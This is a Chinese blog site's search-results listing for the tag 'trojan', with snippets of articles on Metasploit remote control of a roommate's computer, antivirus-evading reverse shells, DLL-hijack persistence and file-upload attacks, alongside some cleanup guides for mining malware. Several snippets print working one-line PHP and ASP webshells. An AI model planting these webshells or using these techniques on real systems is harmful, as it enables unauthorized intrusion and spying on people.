搜索结果
查询Tags标签: 木马,共有 52条记录-
用metasploit映射公网远程控制舍友电脑
用metasploit映射公网远程控制舍友电脑 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。 实验原理:用metasploit制作木马,发送到目标主机上,双击运行…
2022/8/31 14:54:39 人评论 次浏览 -
网络安全基础知识
信息系统什么是计算机网络?网络就是利用传输介质把分布在不同地理位置、具有独立功能的计算机和通讯设备,通过网络协议,实现资源共享和信息传递等目的计算机系统。传输介质导向式网线六类 ——百兆 超六类线 七类线——千兆 超七类线 八类线——万兆光纤单模光纤 多模光…
2022/8/23 6:52:46 人评论 次浏览 -
python 实现nc功能 免杀案例——的确可以绕过奇安信,defender这些edr
这里仅用反弹powershell演示,大家可以发挥脑洞自创反弹shell免杀五部曲:1:确定想法2:实现框架3:增加保护4:启动木马5:维持会话或提权1|2一,确定想法用python服务器与客户端的原理制作反弹shell的控制端与被控制端,最后执行在会话中执行恶意命令来获取一个稳定的powershel…
2022/8/2 1:23:57 人评论 次浏览 -
文件上传
一句话木马:上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限 php一句话木马: <?php @eval($_POST[value]); ?> asp一句话木马: <%eval request ("value")%> 或 <% execute(request("value")) %> …
2022/6/30 23:20:12 人评论 次浏览 -
linux系统挖矿木马清理流程
一、查看cpu占用率 如果您的主机CPU占用率居高不下,那么主机很有可能已经被植入了挖矿木马,会影响服务器上的其他应用的正常运行,需要立刻上机排查。 top -c二、清理挖矿木马 1.及时隔离主机 2.阻断异常网络通信 挖矿木马不仅会连接矿池,还有可能会连接黑客的C2服务器…
2022/4/13 7:14:33 人评论 次浏览 -
sql注入之文件的读写------上传一句话木马
sql注入文件的读写 一、mysql读写文件的基本条件 1、数据库允许读写文件mysql 新版本下secure-file-priv字段 : secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。 secure_file_priv的值为null ,表示限制mysqld 不允许…
2022/4/9 2:19:28 人评论 次浏览 -
C++木马免杀过国产杀软
C++木马免杀过国产杀软 作者: liusuxy / liusuxyds 开源,开思路原理说明:C++将运行木马的代码用函数套娃代码编写: #include <stdio.h> #include <stdlib.h> int main3() {system(" 这里放入Base64后的一句话反弹SHELL ");return 0; }int main2() …
2022/2/4 1:12:56 人评论 次浏览 -
基于Windows系统应用的权限维持
1.dll劫持 生成dll 通过msf将dll木马上传到目标应用程序的dll文件夹里面,然后通过msf来将木马dll名称和正常dll名称进行互换远程开启监听,然后一旦目标机器的应用程序运行就会触发dll木马,从而获取shell
2022/2/3 7:16:46 人评论 次浏览 -
Centos Linux下使用Metasploit渗透android,h5移动端面试题
木马生成完毕,msfvenom兄弟的工作就基本完工了,接下来就有请msfconsole上场了,没错,就是打开metasploit的控制台,着手配置相关信息,开始渗透了~直接输入msfconsole$ msfconsole 长久看多了单调代码的你,下面的图形代码有没有让你灰色的世界多点点色彩~~谈正事~我们…
2022/1/31 7:08:02 人评论 次浏览 -
PHP一句话木马
<?php @eval($_POST[meng]); ?> 说明:@:错误控制符,即使出现错误,也无视出现的错误信息,继续执行下边的代码。eval()函数:把字符串按照PHP 代码来计算。该字符串必须是合法的PHP代码,且必须以分号结尾。meng:名称可以随便定义,是接收菜刀或蚁剑通过 POST…
2022/1/29 1:05:06 人评论 次浏览 -
技术周刊2021-01-18
进阶知识 node_modules的困境及改进方案探讨 node_modules作为工程中的“黑洞”,给前端开发造成了性能和空间浪费,本文探讨了一些改进方案,值得一读。隐藏在浏览器背后的“黑手” 本文从黑产攻击方式、木马恶意行为、监控及防御方案等角度对 Lnkr 木马进行分析,此类木…
2021/12/20 6:21:26 人评论 次浏览 -
技术周刊2021-01-18
进阶知识 node_modules的困境及改进方案探讨 node_modules作为工程中的“黑洞”,给前端开发造成了性能和空间浪费,本文探讨了一些改进方案,值得一读。隐藏在浏览器背后的“黑手” 本文从黑产攻击方式、木马恶意行为、监控及防御方案等角度对 Lnkr 木马进行分析,此类木…
2021/12/20 6:21:26 人评论 次浏览 -
一句话木马
一、环境 kali和win2003server都处于NAT模式 二、操作过程 1、在kali的网站目录/var/www/html下新建一个PHP文件,命名为shell.php,写上php代码:<?php system($_REQUEST[cmd]);?> 2、用命令行创建文件的方法3、查看kali的IP地址:192.168.252.131 4、开启kali的…
2021/12/17 6:22:32 人评论 次浏览 -
一句话木马
一、环境 kali和win2003server都处于NAT模式 二、操作过程 1、在kali的网站目录/var/www/html下新建一个PHP文件,命名为shell.php,写上php代码:<?php system($_REQUEST[cmd]);?> 2、用命令行创建文件的方法3、查看kali的IP地址:192.168.252.131 4、开启kali的…
2021/12/17 6:22:32 人评论 次浏览 -
linux云服务器清除挖矿木马
一、什么是挖矿木马 挖矿木马会占用CPU进行超频运算,从而占用主机大量的CPU资源,严重影响服务器上的其他应用的正常运行。黑客为了得到更多的算力资源,一般都会对全网进行无差别扫描,同时利用SSH爆破和漏洞利用等手段攻击主机。部分挖矿木马还具备蠕虫化的特点,在主机…
2021/12/16 7:14:54 人评论 次浏览